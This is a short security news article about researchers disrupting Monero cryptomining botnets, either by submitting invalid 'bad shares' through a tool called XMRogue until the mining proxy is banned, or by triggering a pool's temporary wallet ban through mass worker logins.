Strategic Disruption of Cryptomining Campaigns Utilizing Malicious Share Techniques and XMRogue Insights

Cybersecurity researchers have identified two innovative techniques that can effectively disrupt cryptocurrency mining botnets. These methods exploit the inherent design of prevalent mining topologies, aiming to halt the mining process entirely.

By leveraging these mining topologies and pool policies, the research team has developed strategies that significantly reduce a cryptominer botnet’s effectiveness, potentially forcing attackers to overhaul their infrastructure or abandon their campaigns altogether.

The first technique, referred to as “bad shares,” involves banning the mining proxy from the network. This action terminates the operation and leads to a dramatic decline in the victim’s CPU usage from 100% to 0%. The mining proxy, serving as an intermediary and protecting the attacker’s mining pool and wallet addresses, becomes vulnerable as it interferes with its normal functions.

In practice, the technique allows connecting to a malicious proxy as a miner, where consecutive submissions of invalid mining job results — known as bad shares — bypass proxy validation. As these bad shares accumulate, they can ultimately get the proxy banned, disrupting the mining operations for the entire botnet.

To implement this, an in-house developed tool named XMRogue is utilized to impersonate a miner, connect to a mining proxy, and submit repeated bad shares to achieve proxy banishment.

The second approach focuses on scenarios where a victim miner connects directly to a public pool without a proxy. In this case, if over 1,000 workers are logged in using the attacker’s wallet simultaneously, the pool may impose a temporary ban on the wallet’s address for one hour. However, this ban is reversible, allowing the account to recover once the login connections cease.

While these strategies have been primarily targeted at Monero miners, their applicability extends to various other cryptocurrencies as well. The techniques reveal how defenders can disrupt harmful cryptominer campaigns while maintaining the integrity of legitimate pool operations by utilizing pool policies effectively.

Legitimate miners can swiftly recover from such methods, as they can easily change their IP address or wallet details. This flexibility represents a significant challenge for malicious cryptominers, as modifying the entire botnet is substantially more complex. In the case of less sophisticated miners, these defensive measures could entirely incapacitate the botnet.